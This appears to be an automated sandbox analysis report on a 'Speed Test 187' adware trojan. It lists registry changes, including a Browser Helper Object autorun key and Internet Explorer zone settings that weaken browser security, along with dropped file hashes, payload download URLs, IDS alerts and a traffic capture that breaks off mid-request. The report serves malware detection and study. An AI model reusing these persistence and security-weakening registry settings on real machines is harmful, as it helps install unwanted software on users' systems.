[HKCR\CLSID\{4A3FC207-C86D-4F11-890A-CA9F75578303}\ProgID]
"(Default)" = "Speed Test 187.ScriptHostObject.1"

[HKCR\TypeLib\{30CC01EB-B247-44A6-8E32-59736942ECC0}\1.0\FLAGS]
"(Default)" = "0"

[HKCR\CLSID\{4A3FC207-C86D-4F11-890A-CA9F75578303}\InprocServer32]
"(Default)" = "%Program Files%\Speed Test 187\ScriptHost.dll"

[HKCU\Software\Speed Test 187]
"installId" = "BD0CAE40-FA0F-485f-886C-43C15CEFD364"

[HKCR\Interface\{1348BD1B-C32A-41A7-9BD4-5377AA1AB925}]
"(Default)" = "ITool"

[HKCR\TypeLib\{30CC01EB-B247-44A6-8E32-59736942ECC0}\1.0\0\win32]
"(Default)" = "%Program Files%\Speed Test 187\ScriptHost.dll"

[HKCR\Speed Test 187.Tool\CLSID]
"(Default)" = "{20EFA753-0D46-4E16-B58D-648F591861CB}"

[HKCR\Speed Test 187.Tool\CurVer]
"(Default)" = "Speed Test 187.Tool.1"

[HKCR\CLSID\{4A3FC207-C86D-4F11-890A-CA9F75578303}]
"(Default)" = "Speed Test 187"

[HKCR\CLSID\{4A3FC207-C86D-4F11-890A-CA9F75578303}\TypeLib]
"(Default)" = "{30CC01EB-B247-44A6-8E32-59736942ECC0}"

[HKCR\AppID\{562B9316-C08A-444A-9482-62080DD851AE}]
"(Default)" = "Speed Test 187"

[HKCR\CLSID\{20EFA753-0D46-4E16-B58D-648F591861CB}]
"(Default)" = "Tool Class"

[HKCR\Speed Test 187.ScriptHostObject\CLSID]
"(Default)" = "{4A3FC207-C86D-4F11-890A-CA9F75578303}"

[HKCR\TypeLib\{30CC01EB-B247-44A6-8E32-59736942ECC0}\1.0]
"(Default)" = "ScriptHost 1.0 Type Library"

[HKCR\AppID\ScriptHost.DLL]
"AppID" = "{562B9316-C08A-444A-9482-62080DD851AE}"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "A7 FA 50 DC 79 5C 75 04 C5 95 AF 41 CC A0 A2 4C"

[HKCR\Speed Test 187.Tool]
"(Default)" = "Tool Class"

[HKCR\Speed Test 187.ScriptHostObject]
"(Default)" = "Speed Test 187"

[HKCR\CLSID\{4A3FC207-C86D-4F11-890A-CA9F75578303}\InprocServer32]
"ThreadingModel" = "Apartment"

[HKCR\Interface\{1348BD1B-C32A-41A7-9BD4-5377AA1AB925}\ProxyStubClsid]
"(Default)" = "{00020424-0000-0000-C000-000000000046}"

[HKCR\Interface\{1348BD1B-C32A-41A7-9BD4-5377AA1AB925}\TypeLib]
"Version" = "1.0"

[HKCR\Speed Test 187.Tool.1]
"(Default)" = "Tool Class"

[HKCR\Speed Test 187.ScriptHostObject.1]
"(Default)" = "Speed Test 187"

[HKCR\Speed Test 187.Tool.1\CLSID]
"(Default)" = "{20EFA753-0D46-4E16-B58D-648F591861CB}"

[HKCR\CLSID\{20EFA753-0D46-4E16-B58D-648F591861CB}\TypeLib]
"(Default)" = "{30CC01EB-B247-44A6-8E32-59736942ECC0}"

[HKCR\CLSID\{20EFA753-0D46-4E16-B58D-648F591861CB}\InprocServer32]
"ThreadingModel" = "Apartment"

It registers itself as a Browser Helper Object (BHO) to ensure its automatic execution every time Internet Explorer is run. It does this by creating the following registry key(s)/entry(ies):

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Browser Helper Objects\{4A3FC207-C86D-4F11-890A-CA9F75578303}]
"NoExplorer" = "1"

The process install_helper_IE.exe:604 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "05 94 9A 83 33 77 FB 09 6B 33 26 CB 37 E0 17 41"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{4A3FC207-C86D-4F11-890A-CA9F75578303}]
"Flags" = "0"

[HKCU\Software\Microsoft\Internet Explorer\Approved Extensions]
"{4A3FC207-C86D-4F11-890A-CA9F75578303}" = "51 66 7A 6C 4C 1D 3B 1B 17 DD 25 57 5E 99 7D 05"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Ext\Settings\{4A3FC207-C86D-4F11-890A-CA9F75578303}]
"Version" = "*"

The process speedtest187.exe:356 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Speed Test 187]
"URLInfoAbout" = "http://www.speedanalysis.com/"

[HKCU\Software\Microsoft\Windows\ShellNoRoam\MUICache\%System%]
"taskkill.exe" = "Kill Process"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Personal" = "%Documents and Settings%\%current user%\My Documents"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd73-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd75-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Speed Test 187]
"DisplayIcon" = "%Program Files%\Speed Test 187\uninstall.exe"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Desktop" = "%Documents and Settings%\All Users\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKCU\Software\Microsoft\Internet Explorer\MINIE]
"CommandBarEnabled" = "1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common Documents" = "%Documents and Settings%\All Users\Documents"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Speed Test 187]
"Publisher" = "Speed Test"
"DisplayName" = "Speed Test 187"

"instdir" = "%Program Files%\Speed Test 187"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "6A AB AF FD D4 EE 9F 67 4F 23 83 93 34 C5 78 65"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Desktop" = "%Documents and Settings%\%current user%\Desktop"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{c155cd72-744b-11e2-8294-806d6172696f}]
"BaseClass" = "Drive"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\MountPoints2\{b98117e8-75ca-11e2-81b2-000c293708fb}]
"BaseClass" = "Drive"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Uninstall\Speed Test 187]
"UninstallString" = "%Program Files%\Speed Test 187\uninstall.exe"
"DisplayVersion" = "3.0.0.0"

The Trojan modifies the IE security-zone settings so that all local web nodes whose names contain no dots and that do not refer to any zone are mapped to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies the IE security-zone settings so that all web nodes that bypass the proxy are mapped to the Intranet Zone:

"ProxyBypass" = "1"

The Trojan modifies the IE security-zone settings so that all URLs are mapped to the Intranet Zone:

"IntranetName" = "1"

Dropped PE files

MD5 File path
6f3836f88650b30d234607ea90ac8513 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\PCP SpeedTest_187\Hash_HMAC.dll
db2927610df2ff9888b394a3c8a918db c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\PCP SpeedTest_187\PCPerformerSetup.exe
34c00546ff4ef8a79d0a64d0b960a787 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\PCP SpeedTest_187\SpeedTest.exe
bd23a611a8a2c22a6944f92825164ffa c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\speedtest187\install_helper.exe
bd23a611a8a2c22a6944f92825164ffa c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\speedtest187\install_helper_FF.exe
bd23a611a8a2c22a6944f92825164ffa c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\speedtest187\install_helper_IE.exe
23bcac4a7c2f60a37937a9b484d18cda c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Application Data\speedtest187\speedtest187.exe
34c00546ff4ef8a79d0a64d0b960a787 c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\4DQJW9YN\speedtest187Setup[1].exe
db2927610df2ff9888b394a3c8a918db c:\Documents and Settings\"%CurrentUserName%"\Local Settings\Temporary Internet Files\Content.IE5\OPQISTQM\PCPerformerSetup_genericv3[1].exe
585a696b6f4b05ad834bdc914bcb67c4 c:\Program Files\PC Performer\CleanSchedule.exe
03a4ba08f44d8c0efa2bbd9c7b3ad341 c:\Program Files\PC Performer\PCPerformer.dll
26135c4c84d63aa01b4bb20d8d2208ec c:\Program Files\PC Performer\PCPerformer.exe
a0c2f8f26ac379d5ff10073cb86c6822 c:\Program Files\PC Performer\isxdl.dll
3363b73d1a770440bd96214026dbd53e c:\Program Files\PC Performer\unins000.exe
71a2dca8f626fcef8bff7e2c17c67a7f c:\Program Files\PC Performer\xmllite.dll
e2cb5a6f64c60aaceb387e4d5146ac54 c:\Program Files\Speed Test 187\AddonsFramework.Typelib.dll
1ff1e74d7d66ba59900398511ace3cb6 c:\Program Files\Speed Test 187\AddonsFramework.Typelib64.dll
668796a2b31e2d971dc78872b2f7da2a c:\Program Files\Speed Test 187\BackgroundHost.exe
fa7bd72fcddd1e370f936a9386f5f358 c:\Program Files\Speed Test 187\BackgroundHost64.exe
b9ceee3108905b38e5ae32ab44968a56 c:\Program Files\Speed Test 187\ButtonSite.dll
fd77f02f5047e9bc75ff9c8ac642905d c:\Program Files\Speed Test 187\ButtonSite64.dll
b7d7ca9989bff651582021d283cffd76 c:\Program Files\Speed Test 187\ScriptHost.dll
169366dbbd04f38604c29dfc2d4773f1 c:\Program Files\Speed Test 187\ScriptHost64.dll
98b17f4587d8236a883077ad8d67c4ab c:\Program Files\Speed Test 187\uninstall.exe
ea3cca7c354681ada6fb436537713011 c:\Program Files\Speed Test 187\uninstall_nsis.exe
b1ec55fff33635ba5faf87c95b2b53ac c:\WINDOWS\system32\roboot.exe

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

No information is available.

PE Sections

Name     Virtual Address   Virtual Size   Raw Size   Entropy   Section MD5
.text    4096              25152          25600      4.45121   1a752074fcd11165f6f148ea63ebe068
.rdata   32768             6346           6656       3.38143   7eb0899a4b6211f8bc545228417d92ad
.data    40960             419452         512        0.94179   b0b1d7c362f8cc76541b7fce5014e602
.ndata   462848            839680         0          0         d41d8cd98f00b204e9800998ecf8427e
.rsrc    1302528           2552           2560       3.15979   a507cfd8d1f72e833c66c1724b493d32

URLs

hxxp://a1961.g.akamai.net/p/03/ca/cc/7d/03cacc7d05899aea99056522d1bc9eb6.swf?clickTAG=http://nym1.ib.adnxs.com/click?oOnlu991iz92hej14raIP6RwPQrXo9g_doXo9eK2iD-f6eW733WLP_6cUIxk4dRkD13e5zAod23UgeVTAAAAAMUsMQDPCAAAnwMAAAIAAAD_cAgBgR4HAAAAAQBVU0QAVVNEACwB-gAbxAAAPeQAAgUAAQIAAJIALC7cfwAAAAA./cnd=%21JgYwOgiTxpcCEP_hoQgYgb0cIAA./referrer=http%3A%2F%2Fwww.performersoft.com%2Fspeedtest%2F%3Fcid%3D4751/clickenc=http%3A%2F%2Ftrack.popmog.com%2Fc%2F2047049%2Fclick%3Fsubid%3D3222725%26sspdata%3Dnym1CI-6-b6Ohsq7bRACGP65wuLIrLjqZCIPMTkzLjEzOC4yNDQuMjMxKAEw1IOWnwU.
hxxp://a1961.g.akamai.net/ANX_async_usersync.js
hxxp://pagead.l.doubleclick.net/pagead/conversion.js
hxxp://pagead.l.doubleclick.net/pagead/conversion/993973503/?random=1407549900333&cv=7&fst=1407549900333&num=1&fmt=2&value=0&label=TcubCPnD8gIQ_6n72QM&bg=ffffff&hl=ar&guid=ON&u_h=846&u_w=1276&u_ah=818&u_aw=1276&u_cd=32&u_his=0&u_tz=180&u_nplug=0&u_nmime=0&frm=0&url=http://www.performersoft.com/speedtest/?cid=4751
hxxp://www-google-analytics.l.google.com/ga.js
hxxp://pagead.l.doubleclick.net/pagead/conversion/983437618/?random=1407549900333&cv=7&fst=1407549900333&num=2&fmt=2&value=0&label=UvAcCIb-uAIQsqL41AM&bg=ffffff&hl=en&guid=ON&u_h=846&u_w=1276&u_ah=818&u_aw=1276&u_cd=32&u_his=0&u_tz=180&u_nplug=0&u_nmime=0&frm=0&url=http://www.performersoft.com/speedtest/?cid=4751
hxxp://www-google-analytics.l.google.com/__utm.gif?utmwv=5.5.4&utms=1&utmn=183511789&utmhn=www.performersoft.com&utmcs=utf-8&utmsr=1276x846&utmvp=1260x697&utmsc=32-bit&utmul=en-us&utmje=1&utmfl=11.6 r602&utmdt=PerformerSoft Speed Test&utmhid=1357867663&utmr=-&utmp=/3850509559/goal&utmht=1407549900552&utmac=UA-16085399-2&utmcc=__utma=125033355.476553240.1407549896.1407549901.1407549901.1;+__utmz=125033355.1407549901.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none);&utmu=DACAAAAAAAAAAAAAAAAB~
hxxp://loadbalancer1.ibariocorp.com/component/logics.swf?nocache=9082
hxxp://pagead46.l.doubleclick.net/pagead/viewthroughconversion/993973503/?random=147077969&cv=7&fst=1407549900333&num=1&fmt=2&value=0&label=TcubCPnD8gIQ_6n72QM&bg=ffffff&hl=ar&guid=ON&u_h=846&u_w=1276&u_ah=818&u_aw=1276&u_cd=32&u_his=0&u_tz=180&u_nplug=0&u_nmime=0&frm=0&url=http://www.performersoft.com/speedtest/?cid=4751&ctc_id=CAIVAgAAAB0CAAAA&ct_cookie_present=false&convclickts=0
hxxp://loadbalancer4.ibariocorp.com/cookie.php?cid=4751
hxxp://pagead46.l.doubleclick.net/pagead/viewthroughconversion/983437618/?random=1279482836&cv=7&fst=1407549900333&num=2&fmt=2&value=0&label=UvAcCIb-uAIQsqL41AM&bg=ffffff&hl=en&guid=ON&u_h=846&u_w=1276&u_ah=818&u_aw=1276&u_cd=32&u_his=0&u_tz=180&u_nplug=0&u_nmime=0&frm=0&url=http://www.performersoft.com/speedtest/?cid=4751&ctc_id=CAIVAgAAAB0CAAAA&ct_cookie_present=false&convclickts=0
hxxp://www-google-analytics.l.google.com/cse/intl/en/images/google_custom_search_watermark.gif
hxxp://www-google-analytics.l.google.com/ads/conversion/983437618/?random=1279482836&cv=7&fst=1407549900333&num=2&fmt=2&value=0&label=UvAcCIb-uAIQsqL41AM&bg=ffffff&hl=en&guid=ON&u_h=846&u_w=1276&u_ah=818&u_aw=1276&u_cd=32&u_his=0&u_tz=180&u_nplug=0&u_nmime=0&frm=0&url=http://www.performersoft.com/speedtest/?cid=4751&ctc_id=CAIVAgAAAB0CAAAA&ct_cookie_present=false&cdct=2&convclickts=0&random=1841122896
hxxp://e3821.dspe1.akamaiedge.net/en_US/fbds.js
hxxp://www-google-analytics.l.google.com/ads/conversion/993973503/?random=147077969&cv=7&fst=1407549900333&num=1&fmt=2&value=0&label=TcubCPnD8gIQ_6n72QM&bg=ffffff&hl=ar&guid=ON&u_h=846&u_w=1276&u_ah=818&u_aw=1276&u_cd=32&u_his=0&u_tz=180&u_nplug=0&u_nmime=0&frm=0&url=http://www.performersoft.com/speedtest/?cid=4751&ctc_id=CAIVAgAAAB0CAAAA&ct_cookie_present=false&cdct=2&convclickts=0&random=2164007956
hxxp://loadbalancer1.ibariocorp.com/component/config.xml
hxxp://loadbalancer1.ibariocorp.com/component/gateway.php
hxxp://www-google-analytics.l.google.com/ads/conversion/993973503/?random=147077969&cv=7&fst=1407549900333&num=1&fmt=2&value=0&label=TcubCPnD8gIQ_6n72QM&bg=ffffff&hl=ar&guid=ON&u_h=846&u_w=1276&u_ah=818&u_aw=1276&u_cd=32&u_his=0&u_tz=180&u_nplug=0&u_nmime=0&frm=0&url=http://www.performersoft.com/speedtest/?cid=4751&ctc_id=CAIVAgAAAB0CAAAA&ct_cookie_present=false&cdct=2&convclickts=0&random=2164007956&ipr=y
hxxp://www-google-analytics.l.google.com/ads/conversion/983437618/?random=1279482836&cv=7&fst=1407549900333&num=2&fmt=2&value=0&label=UvAcCIb-uAIQsqL41AM&bg=ffffff&hl=en&guid=ON&u_h=846&u_w=1276&u_ah=818&u_aw=1276&u_cd=32&u_his=0&u_tz=180&u_nplug=0&u_nmime=0&frm=0&url=http://www.performersoft.com/speedtest/?cid=4751&ctc_id=CAIVAgAAAB0CAAAA&ct_cookie_present=false&cdct=2&convclickts=0&random=1841122896&ipr=y
hxxp://loadbalancer1.ibariocorp.com/component/graphics.swf?nocache=413332.6606824994
hxxp://www.zulagames.com/cookie.php?cid=4751
hxxp://www.google-analytics.com/__utm.gif?utmwv=5.5.4&utms=1&utmn=183511789&utmhn=www.performersoft.com&utmcs=utf-8&utmsr=1276x846&utmvp=1260x697&utmsc=32-bit&utmul=en-us&utmje=1&utmfl=11.6 r602&utmdt=PerformerSoft Speed Test&utmhid=1357867663&utmr=-&utmp=/3850509559/goal&utmht=1407549900552&utmac=UA-16085399-2&utmcc=__utma=125033355.476553240.1407549896.1407549901.1407549901.1;+__utmz=125033355.1407549901.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none);&utmu=DACAAAAAAAAAAAAAAAAB~
hxxp://code.jquery.com/jquery-1.9.1.min.js
hxxp://www.performersoft.com/speedtest/?cid=4751
hxxp://cdn.adnxs.com/ANX_async_usersync.js 67.132.183.48
hxxp://ib.adnxs.com/ttj?ttjb=1&bdc=1407549908&bdh=B-C0wF_vJGE4ovFan2_T-SXXLqk.&bdref=http://www.performersoft.com/speedtest/?cid=4751&bdtop=true&bdifs=1&id=3222725&referrer=[REFERRER_URL]
hxxp://ajax.googleapis.com/ajax/libs/jquery/1.9.1/jquery.min.js
hxxp://googleads.g.doubleclick.net/pagead/viewthroughconversion/993973503/?random=147077969&cv=7&fst=1407549900333&num=1&fmt=2&value=0&label=TcubCPnD8gIQ_6n72QM&bg=ffffff&hl=ar&guid=ON&u_h=846&u_w=1276&u_ah=818&u_aw=1276&u_cd=32&u_his=0&u_tz=180&u_nplug=0&u_nmime=0&frm=0&url=http://www.performersoft.com/speedtest/?cid=4751&ctc_id=CAIVAgAAAB0CAAAA&ct_cookie_present=false&convclickts=0
hxxp://ib.adnxs.com/bounce?/ttj?id=3222726&referrer=[REFERRER_URL]
hxxp://www.performersoft.com/speedtest/media/bg.jpg
hxxp://www.google.com.ua/ads/conversion/983437618/?random=1279482836&cv=7&fst=1407549900333&num=2&fmt=2&value=0&label=UvAcCIb-uAIQsqL41AM&bg=ffffff&hl=en&guid=ON&u_h=846&u_w=1276&u_ah=818&u_aw=1276&u_cd=32&u_his=0&u_tz=180&u_nplug=0&u_nmime=0&frm=0&url=http://www.performersoft.com/speedtest/?cid=4751&ctc_id=CAIVAgAAAB0CAAAA&ct_cookie_present=false&cdct=2&convclickts=0&random=1841122896&ipr=y
hxxp://connect.facebook.net/en_US/fbds.js
hxxp://cdn.adnxs.com/p/03/ca/cc/7d/03cacc7d05899aea99056522d1bc9eb6.swf?clickTAG=http://nym1.ib.adnxs.com/click?oOnlu991iz92hej14raIP6RwPQrXo9g_doXo9eK2iD-f6eW733WLP_6cUIxk4dRkD13e5zAod23UgeVTAAAAAMUsMQDPCAAAnwMAAAIAAAD_cAgBgR4HAAAAAQBVU0QAVVNEACwB-gAbxAAAPeQAAgUAAQIAAJIALC7cfwAAAAA./cnd=%21JgYwOgiTxpcCEP_hoQgYgb0cIAA./referrer=http%3A%2F%2Fwww.performersoft.com%2Fspeedtest%2F%3Fcid%3D4751/clickenc=http%3A%2F%2Ftrack.popmog.com%2Fc%2F2047049%2Fclick%3Fsubid%3D3222725%26sspdata%3Dnym1CI-6-b6Ohsq7bRACGP65wuLIrLjqZCIPMTkzLjEzOC4yNDQuMjMxKAEw1IOWnwU. 67.132.183.48
hxxp://ib.adnxs.com/ttj?id=3222725&referrer=[REFERRER_URL]
hxxp://www.google-analytics.com/analytics.js
hxxp://www.performersoft.com/speedtest/media/footer.jpg
hxxp://www.performersoft.com/component/gateway.php
hxxp://fonts.googleapis.com/css?family=Open Sans:400,600,700,800
hxxp://www.appregis.com/service/country.php
hxxp://www.performersoft.com/component/logics.swf?nocache=9082
hxxp://www.performersoft.com/component/graphics.swf?nocache=413332.6606824994
hxxp://ib.adnxs.com/ttj?id=3222726&referrer=[REFERRER_URL]
hxxp://googleads.g.doubleclick.net/pagead/viewthroughconversion/983437618/?random=1279482836&cv=7&fst=1407549900333&num=2&fmt=2&value=0&label=UvAcCIb-uAIQsqL41AM&bg=ffffff&hl=en&guid=ON&u_h=846&u_w=1276&u_ah=818&u_aw=1276&u_cd=32&u_his=0&u_tz=180&u_nplug=0&u_nmime=0&frm=0&url=http://www.performersoft.com/speedtest/?cid=4751&ctc_id=CAIVAgAAAB0CAAAA&ct_cookie_present=false&convclickts=0
hxxp://www.googleadservices.com/pagead/conversion/983437618/?random=1407549900333&cv=7&fst=1407549900333&num=2&fmt=2&value=0&label=UvAcCIb-uAIQsqL41AM&bg=ffffff&hl=en&guid=ON&u_h=846&u_w=1276&u_ah=818&u_aw=1276&u_cd=32&u_his=0&u_tz=180&u_nplug=0&u_nmime=0&frm=0&url=http://www.performersoft.com/speedtest/?cid=4751 173.194.43.77
hxxp://cdn3.optimizely.com/js/geo2.js 23.218.45.136
hxxp://cdn.adnxs.com/p/03/ca/cc/7d/03cacc7d05899aea99056522d1bc9eb6.swf 67.132.183.48
hxxp://www.google.com/ads/conversion/993973503/?random=147077969&cv=7&fst=1407549900333&num=1&fmt=2&value=0&label=TcubCPnD8gIQ_6n72QM&bg=ffffff&hl=ar&guid=ON&u_h=846&u_w=1276&u_ah=818&u_aw=1276&u_cd=32&u_his=0&u_tz=180&u_nplug=0&u_nmime=0&frm=0&url=http://www.performersoft.com/speedtest/?cid=4751&ctc_id=CAIVAgAAAB0CAAAA&ct_cookie_present=false&cdct=2&convclickts=0&random=2164007956
hxxp://www.performersoft.com/component/img/banner-sa.png
hxxp://www.performersoft.com/component/img/whitebg.png
hxxp://www.google.com/cse/intl/en/images/google_custom_search_watermark.gif
hxxp://www.google.com.ua/ads/conversion/993973503/?random=147077969&cv=7&fst=1407549900333&num=1&fmt=2&value=0&label=TcubCPnD8gIQ_6n72QM&bg=ffffff&hl=ar&guid=ON&u_h=846&u_w=1276&u_ah=818&u_aw=1276&u_cd=32&u_his=0&u_tz=180&u_nplug=0&u_nmime=0&frm=0&url=http://www.performersoft.com/speedtest/?cid=4751&ctc_id=CAIVAgAAAB0CAAAA&ct_cookie_present=false&cdct=2&convclickts=0&random=2164007956&ipr=y
hxxp://cdn.optimizely.com/js/130131868.js
hxxp://www.performersoft.com/speedtest/media/PaUkffsP_bigger.gif
hxxp://www.googleadservices.com/pagead/conversion.js 173.194.43.77
hxxp://ib.adnxs.com/ttj?ttjb=1&bdc=1407549908&bdh=B-C0wF_vJGE4ovFan2_T-SXXLqk.&bdref=http://www.performersoft.com/speedtest/?cid=4751&bdtop=true&bdifs=1&id=3222726&referrer=[REFERRER_URL]
hxxp://www.performersoft.com/component/config.xml
hxxp://www.google-analytics.com/collect?v=1&_v=j24&a=1357867663&t=pageview&_s=1&dl=http://www.performersoft.com/speedtest/?cid=4751&ul=en-us&de=utf-8&dt=PerformerSoft Speed Test&sd=32-bit&sr=1276x846&vp=1276x697&je=0&fl=11.6 r602&_u=ME~&cid=476553240.1407549896&tid=UA-42277600-10&z=1548146158
hxxp://www.performersoft.com/component/js/swfobject.js
hxxp://www.appregis.com/files/components/speedtest187Setup.exe
hxxp://www.performersoft.com/speedtest/media/speed-analisys.png
hxxp://www.googleadservices.com/pagead/conversion/993973503/?random=1407549900333&cv=7&fst=1407549900333&num=1&fmt=2&value=0&label=TcubCPnD8gIQ_6n72QM&bg=ffffff&hl=ar&guid=ON&u_h=846&u_w=1276&u_ah=818&u_aw=1276&u_cd=32&u_his=0&u_tz=180&u_nplug=0&u_nmime=0&frm=0&url=http://www.performersoft.com/speedtest/?cid=4751 173.194.43.77
hxxp://www.performersoft.com/component/img/banner-pcp.png
hxxp://www.performersoft.com/speedtest/media/style.css
hxxp://www.google-analytics.com/ga.js
hxxp://themes.googleusercontent.com/static/fonts/opensans/v9/cJZKeOuBrn4kERxqtaUH3fY6323mHUZFJMgTvxaG2iE.eot
hxxp://www.performersoft.com/speedtest/media/body-bg.jpg
hxxp://www.google.com/ads/conversion/983437618/?random=1279482836&cv=7&fst=1407549900333&num=2&fmt=2&value=0&label=UvAcCIb-uAIQsqL41AM&bg=ffffff&hl=en&guid=ON&u_h=846&u_w=1276&u_ah=818&u_aw=1276&u_cd=32&u_his=0&u_tz=180&u_nplug=0&u_nmime=0&frm=0&url=http://www.performersoft.com/speedtest/?cid=4751&ctc_id=CAIVAgAAAB0CAAAA&ct_cookie_present=false&cdct=2&convclickts=0&random=1841122896
hxxp://www.appregis.com/files/products/PCPerformerSetup_genericv3.exe
www.facebook.com 31.13.74.144


IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

ET POLICY User-Agent (NSIS_Inetc (Mozilla)) - Sometimes used by hostile installers
ET MALWARE Possible Windows executable sent when remote host claims to send html content
ET SHELLCODE Possible TCP x86 JMP to CALL Shellcode Detected
ET TROJAN VMProtect Packed Binary Inbound via HTTP - Likely Hostile
ET POLICY Outdated Windows Flash Version IE

Traffic

<font color="red">GET /pagead/conversion.js HTTP/1.1<br>
Accept: */*<br>
Referer: hXXp://VVV.performersoft.com/speedtest/?cid=4751<br>
Accept-Language: en-us<br>
Accept-Encoding: gzip, deflate<br>
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022; .NET4.0C)<br>
Host: VVV.googleadservices.com<br>
Connection: Keep-Alive<br>
<br>
</font><br><font color="blue">HTTP/1.1 200 OK<br>
P3P: policyref="hXXp://VVV.googleadservices.com/pagead/p3p.xml", CP="NOI DEV PSA PSD IVA IVD OTP OUR OTR IND OTC"<br>
Content-Type: text/javascript; charset=UTF-8<br>
ETag: 10951747834593842486<br>
Date: Fri, 08 Aug 2014 04:28:26 GMT<br>
Expires: Sat, 09 Aug 2014 04:28:26 GMT<br>
X-Content-Type-Options: nosniff<br>
Content-Disposition: attachment; filename="f.txt"<br>
Content-Encoding: gzip<br>
Server: cafe<br>
Content-Length: 3638<br>
X-XSS-Protection: 1; mode=block<br>
Age: 77805<br>
Cache-Control: public, max-age=86400<br>
Alternate-Protocol: 80:quic<br><pre>...........Z.s....=..h:.:\[email protected]..<br>...J./...y..I.(........N.D....g......y.n..F"..pR..C..x....$...lgq..h,.<br>e.../.....Br..c.<..z.E....i..u....px..\R.a.A....h=.M\5[....TGrm6$\.<br>m...Z...p.N[-..]...pI..&..w.cTPt!...}r..E...x....d...~o.e..{.....7....<br>.*.R'O."HD#....c.........Q.....(.....g;v6.......\|ke}.b...9[.../aE...o<br>^.k......~gQS.\..?....Jwi..d/.Z.......f3.vt.l..D..".V4...~....y.7..).t<br>.<...[h.kt_...y.k.*.......lb.|.Ox..h.i..K...D.g...........X.Y#.n.FH<br>6..=7.,1`...K8.KX''..~..W..z..&.]..f.....0....w..E......?.~.."~.....k-<br>..."[S.....C>..d[..^H../..;.j.&..9W1....X.8.1z...p....>......W.}<br>m..{j..T....v.k.......n.........Z-........w...6.P.|G....C|...P.qh....6<br>..C.ob...n..t..... ...w.].9..J:.".....T.L...!c.7l6.Y...8....uu..x"'J.0<br>i9'..n;4.0,.Cg4B#._..#8.<....)....{......r ...M.......y......N.....<br>5J3q....hq........P...~../e..LjeA.p..E....^...x....QK0o..u^...^n..:S-.<br>....r.....". ..J!tT:$g.F..W.d.....l....m..b......:.Z.[.........T.\u<<br>;hL[.*g"........}.:g......\.N./.Q.n.s..pX.....'o...s.....m......]j....<br>3..#.(..b.Da..c...;.|.<.!.Zk....q.....%...Z....;.8...PC........EP' <br>..X..~..z...:...r2U.X.y<.)..8....~..q"x.Lk&.S1O..e.F.1..^..,..u.O.y<br>]..d.7..Z..1.X.;.F.H....w.I..pZ..O$[..../..H\.j.. . .l.W\....t ../....<br>..D.).Aok.U..di'Y....G...e.#....l%...)......i H.".,.b.f.......R..K...(<br>........*2. O?_..F,..w...;.....{.}V.gU.X.....-~_..k....:...^h....B..bE<br>oW;.......7....o.U..!..jvu.B.;.Me9.3...Z...[...LX.~...7.Vf...E.....Y.1<br>....kQ.\.,.(.Z.._......jn&G....6.:...[j....RF..IH.b7.<......@..</pre><<< skipped >>></font><br><br><font color="red">GET /pagead/conversion/993973503/?random=1407549900333&cv=7&fst=1407549900333&num=1&fmt=2&value=0&label=TcubCPnD8gIQ_6n72QM&bg=ffffff&hl=ar&guid=ON&u_h=846&u_w=1276&u_ah=818&u_aw=1276&u_cd=32&u_his=0&u_tz=180&u_nplug=0&u_nmime=0&frm=0&url=http://VVV.performersoft.com/speedtest/?cid=4751 HTTP/1.1<br>
Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/x-ms-application, application/x-ms-xbap, application/vnd.ms-xpsdocument, application/xaml xml, */*<br>
Referer: hXXp://VVV.performersoft.com/speedtest/?cid=4751<br>
Accept-Language: en-us<br>
Accept-Encoding: gzip, deflate<br>
